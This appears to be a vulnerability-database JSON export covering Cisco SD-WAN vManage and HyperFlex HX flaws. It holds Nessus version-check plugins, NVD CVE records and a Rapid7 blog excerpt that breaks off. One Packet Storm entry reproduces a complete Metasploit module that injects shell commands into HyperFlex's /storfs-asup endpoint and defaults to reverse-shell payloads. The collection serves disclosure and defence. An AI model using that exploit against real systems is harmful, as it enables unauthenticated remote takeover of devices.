"title": "Cisco SD-WAN vManage Software Vulnerabilities (cisco-sa-sd-wan-vmanage-4TbynnhZ)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1506", "CVE-2021-1508", "CVE-2021-1505"], "modified": "2021-05-10T00:00:00", "cpe": ["cpe:/o:cisco:sd-wan_firmware", "cpe:/a:cisco:sd-wan_vmanage"], "id": "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ.NASL", "href": "https://www.tenable.com/plugins/nessus/149363", "sourceData": "#TRUSTED 452fcb0c1372c66e25b37216a6675773a42b025cc2764f8d26d7175b72cdedc1277dc555f104000e8bcf40330148e79a3eb9d12546c7f1322d3ff70ae50522cab7f1f212e7a3765e76c19a3e6744da50749fd919d9f5fe51e8dae6ef92cdb2a83375444533c425fe6144241e6f99b84ef8b3448f3f0e73e8f0660dc2145ffd41de8aee5b7041c0c21373cf9cd57ed6eb1e2d985ec2322aa41b34bc4ec5576bd2d052e5e138293003adb2df3ff6678b0c04a4b502ca98d94f4808c72b0b7cdc17077d5cc61504b7fa8390f8db8d26e6fe976954c8251bfe48d5d36d445d46729cda5d0d5bd1a68331b1b99550f41b0cf9ab96e2cbfc4c1b6e4e2839c5c7abae3e30ad16e0e104e3e5559a1543762e9209c648aaae8cdf64366a3cfaf37d53d3bd85c76c5c174edb4355655371daf3e58c6091607405a7b7a8731b568b52f7f8d1594b72545098ab0d2bfdefa5d64d88f35309787fa78f08395465dc348545d08fc3d3a9a2bebc93b241f5d6280db47e70a3b88b54794c114c09e59c98f8d733df179c1d993dce32127d7f2086de6e6a73e99d4bb7f1a040d7c6c2477bfa06d82b747dcbf62a0f518d3329b8f1b166b64d7fcd166e318b273fb55c533240094e012a0f5dee3180ac623e96eae40c3c513c28434f160ea8895c1c98ec23b264986aad817fa4e2c925bcd83e8ece66ac3e1f3932ca69d782efd6fc9b4e79a8fcfdb6\n#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149363);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/17\");\n\n script_cve_id(\n \"CVE-2021-1275\",\n \"CVE-2021-1468\",\n \"CVE-2021-1505\",\n \"CVE-2021-1506\",\n \"CVE-2021-1508\"\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu28360\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu28390\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu28402\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu28454\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-sd-wan-vmanage-4TbynnhZ\");\n\n script_name(english:\"Cisco SD-WAN vManage Software Vulnerabilities (cisco-sa-sd-wan-vmanage-4TbynnhZ)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, Cisco SD-WAN Viptela Software is affected by multiple vulnerabilities that\nallow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an\nauthenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?769d3f6f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu28360\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu28390\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu28402\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu28454\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvu28360, CSCvu28390, CSCvu28402, CSCvu28454\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 862, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:sd-wan_vmanage\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:sd-wan_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_vedge_detect.nbin\");\n script_require_keys(\"Cisco/Viptela/Version\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Viptela');\n\nif (tolower(product_info['model']) !~ \"vmanage\")\n audit(AUDIT_HOST_NOT, 'an affected model');\n\nvar vuln_ranges = [\n { 'min_ver' : '0.0', 'fix_ver' : '20.3.3' },\n { 'min_ver' : '20.4', 'fix_ver' : '20.4.1' },\n { 'min_ver' : '20.5', 'fix_ver' : '20.5.1' }\n];\n\nvar reporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'bug_id' , 'CSCvu28360, CSCvu28390, CSCvu28402, CSCvu28454',\n 'version' , product_info['version'],\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n vuln_ranges:vuln_ranges,\n reporting:reporting\n);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-07T22:47:00", "description": "The version of Cisco HyperFlex HX installed on the remote host is affected by multiple command injection \nvulnerabilities. An unauthenticated, remote attacker can exploit these to execute arbitrary commands on an affected \nsystem.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.", "edition": 4, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-05-13T00:00:00", "title": "Cisco HyperFlex HX Command Injection Vulnerabilities (cisco-sa-hyperflex-rce-TjjNrkpR)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1498", "CVE-2021-1497"], "modified": "2021-05-13T00:00:00", "cpe": ["cpe:/a:cisco:hyperflex_hx-series_software"], "id": "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL", "href": "https://www.tenable.com/plugins/nessus/149454", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149454);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/07\");\n\n script_cve_id(\"CVE-2021-1497\", \"CVE-2021-1498\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvx36014\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvx36019\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvx37435\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-hyperflex-rce-TjjNrkpR\");\n script_xref(name:\"IAVA\", value:\"2021-A-0237\");\n\n script_name(english:\"Cisco HyperFlex HX Command Injection Vulnerabilities (cisco-sa-hyperflex-rce-TjjNrkpR)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Cisco HyperFlex HX installed on the remote host is affected by multiple command injection \nvulnerabilities. An unauthenticated, remote attacker can exploit these to execute arbitrary commands on an affected \nsystem.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c9228075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx36014\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx36019\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx37435\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvx36014, CSCvx36019, CSCvx37435\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1497\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Cisco HyperFlex HX Data Platform Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(78);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:hyperflex_hx-series_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_hyperflex_web_api_detect.nbin\");\n script_require_keys(\"Host/OS/Cisco_HyperFlex_web_API\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'Cisco HyperFlex', port:port);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n {'fixed_version':'4.0.2e'}, \n {'min_version':'4.5.0', 'fixed_version':'4.5.2a'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info, \n constraints:constraints, \n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-06-08T07:48:15", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "title": "CVE-2021-1498", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1498"], "modified": "2021-06-07T20:57:00", "cpe": ["cpe:/o:cisco:hyperflex_hx_data_platform:4.5\\(2a\\)"], "id": "CVE-2021-1498", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1498", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.5\\(2a\\):*:*:*:*:*:*:*"]}, {"lastseen": "2021-05-18T01:52:39", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. For more information about these vulnerabilities, see the Details section of this advisory.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "title": "CVE-2021-1275", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1275"], "modified": "2021-05-13T19:35:00", "cpe": [], "id": "CVE-2021-1275", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1275", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": []}, {"lastseen": "2021-06-08T07:48:15", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "title": "CVE-2021-1497", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497"], "modified": "2021-06-07T20:57:00", "cpe": ["cpe:/o:cisco:hyperflex_hx_data_platform:4.0\\(2a\\)"], "id": "CVE-2021-1497", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1497", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\\(2a\\):*:*:*:*:*:*:*"]}, {"lastseen": "2021-05-18T01:52:40", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. For more information about these vulnerabilities, see the Details section of this advisory.", "edition": 3, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "title": "CVE-2021-1506", "type": "cve", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1506"], "modified": "2021-05-14T14:37:00", "cpe": [], "id": "CVE-2021-1506", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1506", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-05-18T01:52:40", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. For more information about these vulnerabilities, see the Details section of this advisory.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "title": "CVE-2021-1505", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1505"], "modified": "2021-05-14T15:07:00", "cpe": [], "id": "CVE-2021-1505", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1505", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-05-18T01:52:40", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. For more information about these vulnerabilities, see the Details section of this advisory.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "title": "CVE-2021-1468", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1468"], "modified": "2021-05-14T15:08:00", "cpe": [], "id": "CVE-2021-1468", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1468", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-05-18T01:52:40", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. For more information about these vulnerabilities, see the Details section of this advisory.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "title": "CVE-2021-1508", "type": "cve", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1508"], "modified": "2021-05-14T14:27:00", "cpe": [], "id": "CVE-2021-1508", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1508", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-06-04T16:21:33", "description": "", "published": "2021-06-04T00:00:00", "type": "packetstorm", "title": "Cisco HyperFlex HX Data Platform Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-06-04T00:00:00", "id": "PACKETSTORM:162976", "href": "https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco HyperFlex HX Data Platform Command Execution', \n'Description' => %q{ \nThis module exploits an unauthenticated command injection in Cisco \nHyperFlex HX Data Platform's /storfs-asup endpoint to execute shell \ncommands as the Tomcat user. \n}, \n'Author' => [ \n'Nikita Abramov', # Discovery \n'Mikhail Klyuchnikov', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-1497'], # HyperFlex HX Data Platform Installer \n['CVE', '2021-1498'], # HyperFlex HX Data Platform \n['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR'], \n['URL', 'https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c'], \n['URL', 'https://twitter.com/ptswarm/status/1390300625129201664'] \n], \n'DisclosureDate' => '2021-05-05', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, # Privesc left as an exercise for the reader \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5]) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => %w[GET POST].sample, \n'uri' => normalize_uri(target_uri.path, 'storfs-asup') \n) \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && \nres.body.include?('Action for the servlet need be specified.') \nreturn CheckCode::Safe \nend \n \nCheckCode::Vulnerable('Storfs ASUP servlet detected.') \nend \n \ndef exploit \nprint_status(\"Selected #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'storfs-asup'), \n'vars_post' => { \n'action' => Faker::Hacker.verb, \n%w[token mode].sample => \"$(#{cmd})\" \n} \n}, datastore['CmdExecTimeout']) \n \nunless res \nprint_warning('Command execution timed out') \nreturn \nend \n \nunless res.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to execute command') \nend \n \nprint_good('Successfully executed command') \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/162976/cisco_hyperflex_hx_data_platform_cmd_exec.rb.txt"}], "rapid7blog": [{"lastseen": "2021-06-12T01:03:26", "bulletinFamily": "info", "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "description": "## NSClient++\n\n\n\nCommunity contributor Yann Castel has contributed an exploit module for NSClient++ which targets an authenticated command execution vulnerability. Users that are able to authenticate to the service as admin can leverage the external scripts feature to execute commands with SYSTEM level privileges. This allows the underlying server to be compromised. Castel is also working on another exploit module for NSClient++ which happens to be a local privilege escalation so stay tuned for more NSClient++ content.\n\n## REDIS Improvements\n\nCommunity member Smashery returned to improve the Framework\u2019s REDIS dumping capabilities. This week two bugs were fixed to ensure that REDIS data can be more easily accessed using the `auxiliary/gather/redis_extractor` module. This module has seen a number of improvements lately and is capable of dumping data from both authenticated and unauthenticated instances.\n\n## POST API Improvements\n\nGoogle Summer of Code student and community member pingport80 has been hard at work making a number of improvements to the POST API used by modules to interact with sessions. The bulk of the improvements have been focused on closing feature gaps in various scenarios. One excellent example of this is the new Process library that allows both shell and Meterpreter sessions to enumerate running processes on multiple platforms. This makes it easier for module developers to write content without worrying about the different capabilities of the various session types.\n\nPingport80 has also been testing various scenarios to find issues related to localization. This has involved finding instances where error messages that are assumed to be in English are used to determine various outcomes and updating them to function regardless of the underlying locale.\n\n## New module content (2)\n\n * [Cisco HyperFlex HX Data Platform Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15281>) by [wvu](<https://github.com/wvu-r7>), Mikhail 